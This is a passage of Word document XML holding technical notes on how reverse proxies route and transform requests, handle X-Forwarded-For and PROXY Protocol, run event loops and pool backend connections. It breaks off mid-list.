    <w:p w14:paraId="18906F0D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>X-API-Version: v1   → v1 backend cluster (legacy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7800F9A5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Accept-Language: zh → China-specific service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58762A6C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Used for versioning, A/B testing, canary deployments, geographic routing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48465843" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Request and Response Transformation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB4D2D0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The reverse proxy can modify requests and responses in flight:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D08528D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Request transformations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3353AEA9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="539"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Add X-Forwarded-For: &lt;client_ip&gt; — tells backend the real client IP (since backend sees proxy IP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C604F27" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="539"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Add X-Request-ID: &lt;uuid&gt; — unique request ID for distributed tracing correlation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C96922" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="539"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Add X-Forwarded-Proto: https — tells backend whether original client used HTTP or HTTPS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD2E84A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="539"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Strip internal headers that clients shouldn't be able to set (e.g., X-Admin: true).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2826156F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="539"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Rewrite URL paths (/v2/users → /users if backend doesn't know about version prefix).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5810FFCA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="539"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Inject authentication headers (proxy handles auth, backend trusts proxy-injected identity).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F31D8A1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Response transformations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56504FB6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="540"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Remove server identification headers (Server: Apache/2.4.1 → leak of implementation detail).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620ECDEF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="540"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>Add security headers (Strict-Transport-Security, Content-Security-Policy, X-Frame-Options).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFF3B57" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="540"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Compress response body (gzip, Brotli) if client supports it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16945991" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="540"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Modify Set-Cookie headers (add Secure, HttpOnly, SameSite attributes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543CC4F3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="540"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Rewrite absolute URLs in response bodies (if backend returns hardcoded internal URLs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5C7DBD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The X-Forwarded-For header chain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09507EE0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>When a request passes through multiple proxies, each proxy appends the IP it received the request from:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7020083A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E88365" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>X-Forwarded-For: client_ip, proxy1_ip, proxy2_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0589F0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The leftmost IP is the original client IP (as reported by the first proxy). The rightmost IP is the most recently added (by the last proxy before your server). </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Never trust the leftmost IP blindly</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — a malicious client can forge the entire X-Forwarded-For header:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4589AAA2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D63D8A6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>X-Forwarded-For: 1.2.3.4, 5.6.7.8    (client fabricated this)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7B434E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Trust only the </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rightmost IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> that you know was added by your own trusted proxy. Better: use PROXY Protocol (below) for trusted IP propagation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D1C980" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PROXY Protocol — The Reliable Alternative:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2BF5E3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>PROXY Protocol (HAProxy's specification, v1 and v2) prepends a short header to the TCP connection before any application data, containing the real client IP and port:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D84DCC1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D15C967" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>PROXY TCP4 192.0.2.1 198.51.100.1 56324 443\r\n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DC66D5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>This is sent at the TCP level — before TLS or HTTP — by the first proxy that terminates the original client connection. Subsequent components read this header to know the real client IP. The backend must be configured to expect and parse PROXY Protocol — a misconfigured backend that doesn't expect it will receive garbled initial data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D61E14D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why PROXY Protocol is more reliable than X-Forwarded-For:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve"> It operates at the TCP layer before application-layer parsing. It cannot be forged by clients because the first proxy adds </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>it after terminating the client's TCP connection. The client never touches the PROXY Protocol header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0D44B3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="6CCB7258">
          <v:rect id="_x0000_i3054" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B117F71" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Proxy Internal Architecture — How Traffic Actually Flows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0952C18F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Event Loop — Non-Blocking I/O Under the Hood</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D84492" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>High-performance proxies (Nginx, Envoy, HAProxy) do not use one thread per connection — that model breaks at high concurrency (thousands to hundreds of thousands of connections). Instead they use </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>event-driven, non-blocking I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CB62A9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The event loop model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2294F47E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>A single thread (or one thread per CPU core) runs an </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>event loop</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — continuously monitoring a set of file descriptors (sockets) for I/O readiness events:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47744C6E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="541"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>epoll (Linux) — scales to millions of file descriptors efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A4FCD0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="541"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>kqueue (macOS/FreeBSD) — similar to epoll.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B83A421" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="541"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>io_uring (Linux 5.1+) — newer, even more efficient, supports async I/O for disk operations too.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043C8DC3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>When a socket is readable (data has arrived) or writable (the kernel's send buffer has space), the event loop calls the appropriate handler. Handlers are </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>non-blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — they read or write as much data as available/possible right now and return immediately. If there's no data to read (would block), the handler returns and the event loop moves on to the next ready socket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22172A6A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The internal state machine per connection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC2DD4D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Each connection through the proxy is a state machine with states like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B0C709" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D08C0D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">ACCEPTING → READING_REQUEST → PARSING_REQUEST → </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729971C9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">SELECTING_BACKEND → CONNECTING_TO_BACKEND → </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AF2C87" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">FORWARDING_REQUEST → READING_RESPONSE → </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724BD7EF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>FORWARDING_RESPONSE → DONE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A7E20F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">The state machine transitions are triggered by I/O events. A connection might be in FORWARDING_REQUEST state — waiting for the backend to accept data — while the </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>event loop simultaneously handles I/O for thousands of other connections in various states.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D984B90" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Buffer management — the internal data path:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3697C5A7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7786788C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Client → [receive buffer] → Proxy → [send buffer] → Backend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCB8DBD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Client ← [send buffer]   ← Proxy ← [receive buffer] ← Backend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280987AB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Each connection has receive and send buffers. Data arrives from the client into the receive buffer. The proxy reads from the receive buffer, optionally transforms the data, writes to the send buffer toward the backend. The kernel's network stack manages the actual TCP window and congestion control — the proxy operates above this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A67647" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Zero-copy optimization:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> For pass-through proxying (no content transformation), modern proxies use splice() or sendfile() system calls to transfer data between two file descriptors (client socket → backend socket) </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>without copying through user space</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>. Data moves directly in the kernel's page cache between the two socket buffers. This eliminates the CPU overhead of two read() + write() calls per chunk of data — critical for high-throughput proxies handling GB/s of traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D143C63" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connection Pooling — The Backend Connection Lifecycle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5D7D73" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Opening a new TCP connection to a backend for every client request is expensive:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A29CA9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="542"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>TCP 3-way handshake: 1 RTT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E60F136" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="542"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>TLS handshake (if backend uses HTTPS): 1–2 additional RTTs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78127B15" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="542"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>TCP slow start: new connections start with a small congestion window, limiting initial throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7808C5FE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connection pool mechanics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A09ABC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The proxy maintains a pool of </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>persistent connections</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> to each backend. When a client request needs to be forwarded:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435CE2B5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="543"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Check the pool for an </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>idle connection</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> to the target backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D720D5F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="543"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If found: dequeue the idle connection, mark it as active, forward the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B77EA9F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="543"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If not found and pool below max size: establish a new connection to the backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4270D24B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="543"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If pool at max size: </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>queue the request</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> until a connection becomes available, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reject</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> the request (fail-fast when backend is at capacity).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D405CE3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>After the backend response is received, the connection is returned to the idle pool (if the connection is still healthy and the pool isn't over the max idle limit).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293861E8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pool parameters that matter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7310DB6B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="544"/>
        </w:numPr>
      </w:pPr>
